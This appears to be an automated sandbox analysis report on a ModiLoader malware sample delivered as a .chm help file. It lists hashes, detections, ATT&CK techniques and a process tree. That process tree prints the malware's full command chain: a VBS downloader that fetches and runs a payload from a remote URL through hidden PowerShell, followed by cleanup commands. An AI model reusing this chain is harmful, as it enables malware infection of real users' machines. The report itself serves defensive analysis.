modiloader | 6f11bddb792856673d09d12e15662d70fa98d16da50d28b21aba4873b6c75fc9

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
18-01-2025 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmpapw1h1a2.chm
Size

75KB
MD5

0e7a4e127728e1e48a95c1928606c0af
SHA1

ec2a102bdda50542f50d4f64f71c48bb9ffea693
SHA256

6f11bddb792856673d09d12e15662d70fa98d16da50d28b21aba4873b6c75fc9
SHA512

7edc1f22041efb93b28e8bfcf9762d3b623f85f43e0bbec32353156e536551be8484394ee8250c3844099ae73bba664acd780c71efa5cc3c3b0748b5539b9c2a
SSDEEP

1536:d4bv2j4YkkT/O1Kr426/wtN7NctHKfTKPG4vWl/Mf9ZViM59gp/:SbqoL1C4ytNMqfmPGd69/C5

Score

10^/10

modiloader defense_evasion discovery execution persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/1184-60-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-77-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-74-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-66-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-64-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-76-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-115-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-114-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-113-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-111-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-108-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-107-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-106-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-104-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-103-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-102-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-99-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-98-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-97-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-95-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-94-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-91-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-90-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-88-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-87-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-85-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-83-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-82-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-81-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-79-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-75-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-73-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-72-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-70-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-110-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-101-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-67-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-92-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-84-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-78-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-71-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-141-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-137-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-134-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-130-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-128-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-69-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-123-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-119-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-116-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-112-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-109-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-105-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-68-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-100-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-96-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-93-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-89-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-86-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-65-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2
behavioral1/memory/1184-80-0x00000000030A0000-0x00000000040A0000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2128	powershell.exe
1684	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2952	ript.exe
1184	x.exe
2636	svchost.pif
2768	svchost.pif
1972	xgtukcbW.pif

Loads dropped DLL 6 IoCs

pid	Process
2128	powershell.exe
2128	powershell.exe
2128	powershell.exe
2128	powershell.exe
1184	x.exe
1184	x.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wbckutgx = "C:\\Users\\Public\\Wbckutgx.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2900	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
10	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1184 set thread context of 1972	1184	x.exe	50

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2840	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ript.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1184	x.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2128	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	2840	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
784	hh.exe
784	hh.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 784 wrote to memory of 2900	784	hh.exe	31
PID 784 wrote to memory of 2900	784	hh.exe	31
PID 784 wrote to memory of 2900	784	hh.exe	31
PID 2900 wrote to memory of 2252	2900	cmd.exe	33
PID 2900 wrote to memory of 2252	2900	cmd.exe	33
PID 2900 wrote to memory of 2252	2900	cmd.exe	33
PID 2900 wrote to memory of 2128	2900	cmd.exe	34
PID 2900 wrote to memory of 2128	2900	cmd.exe	34
PID 2900 wrote to memory of 2128	2900	cmd.exe	34
PID 2128 wrote to memory of 2952	2128	powershell.exe	35
PID 2128 wrote to memory of 2952	2128	powershell.exe	35
PID 2128 wrote to memory of 2952	2128	powershell.exe	35
PID 2900 wrote to memory of 1684	2900	cmd.exe	37
PID 2900 wrote to memory of 1684	2900	cmd.exe	37
PID 2900 wrote to memory of 1684	2900	cmd.exe	37
PID 1684 wrote to memory of 2064	1684	powershell.exe	38
PID 1684 wrote to memory of 2064	1684	powershell.exe	38
PID 1684 wrote to memory of 2064	1684	powershell.exe	38
PID 2900 wrote to memory of 2840	2900	cmd.exe	40
PID 2900 wrote to memory of 2840	2900	cmd.exe	40
PID 2900 wrote to memory of 2840	2900	cmd.exe	40
PID 2064 wrote to memory of 1656	2064	cmd.exe	41
PID 2064 wrote to memory of 1656	2064	cmd.exe	41
PID 2064 wrote to memory of 1656	2064	cmd.exe	41
PID 2064 wrote to memory of 1184	2064	cmd.exe	42
PID 2064 wrote to memory of 1184	2064	cmd.exe	42
PID 2064 wrote to memory of 1184	2064	cmd.exe	42
PID 2064 wrote to memory of 1184	2064	cmd.exe	42
PID 1184 wrote to memory of 2196	1184	x.exe	44
PID 1184 wrote to memory of 2196	1184	x.exe	44
PID 1184 wrote to memory of 2196	1184	x.exe	44
PID 1184 wrote to memory of 2196	1184	x.exe	44
PID 1184 wrote to memory of 2624	1184	x.exe	46
PID 1184 wrote to memory of 2624	1184	x.exe	46
PID 1184 wrote to memory of 2624	1184	x.exe	46
PID 1184 wrote to memory of 2624	1184	x.exe	46
PID 1184 wrote to memory of 1972	1184	x.exe	50
PID 1184 wrote to memory of 1972	1184	x.exe	50
PID 1184 wrote to memory of 1972	1184	x.exe	50
PID 1184 wrote to memory of 1972	1184	x.exe	50
PID 1184 wrote to memory of 1972	1184	x.exe	50
PID 1184 wrote to memory of 1972	1184	x.exe	50

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\tmpapw1h1a2.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:2252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:2952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:1656
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:1184
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Public\WbckutgxF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2196
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2624
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:2636
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:2768
      - C:\Users\Public\Libraries\xgtukcbW.pif
        
        C:\Users\Public\Libraries\xgtukcbW.pif
        6⤵
        Executes dropped EXE
        
        PID:1972
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
973KB

MD5
72d63924b474c076c3f54e556dcd3f8b

SHA1
bf448f7c1d3a8906b6c697d2f2dadf58e56f7bbf

SHA256
d78342ca78b975e822d380ccf2d2e8ec9dc910f91eefdeb049f28e7c97598c68

SHA512
b846ade542938e2b70375620c3d2b8e8c28b1232cbf3d11c62ba21109a2d1b1733b5951ba57f1369532bc5fd75cc7466eb8552bf8d439c39418048446aebba55

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
68dbfbb501b0fd2a5c93b188fbba99ee

SHA1
46935c34286e3e7420bef5f1454342ea671376e2

SHA256
c74e8c3a7a860bb7bfb3c97e82e6a1bfbcedb897c71f2b29173067038e2ce9b8

SHA512
5015189c20ec737c85452d338c430defaa9f7e09aadc8a1c4cb06d221a63e77874c040122c2d92f6dfb11a26293ef6e8d7b92549c5ac5c89931fef6a75de365a

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\WbckutgxF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\df.cmd

Filesize
973KB

MD5
fe9ba1e63886404362429422d9ec8846

SHA1
2e118b88683977b9b837a8f7211e49fb9ef966f9

SHA256
95e4f54d453befb480ab80aaa19d334064a1655f4c00ab2212bb1b34044809a8

SHA512
2bf72df9a3e925b188e0d04bede8103b0f585788c0ca9664ffb55facd095e557906d08769d6c154d9992378a0a936607bcdb587b7670447a9a64955b892ce696

Download Submit
C:\Users\Public\ript.exe

Filesize
152KB

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
\Users\Public\Libraries\xgtukcbW.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
memory/1184-73-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-101-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-64-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-76-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-115-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-114-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-113-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-111-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-108-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-107-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-106-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-104-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-103-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-102-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-99-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-98-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-97-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-95-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-94-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-91-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-90-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-88-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-87-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-85-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-83-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-82-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-81-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-79-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-75-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-74-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-72-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-70-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-110-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-66-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-67-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-92-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-84-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-78-0x00000000030A0000-0x00000000040A0000-memory.dmp

Filesize
16.0MB

Download
memory/1184-71-0x00000000030A0000-0x00000000040A0000-memory.dmp

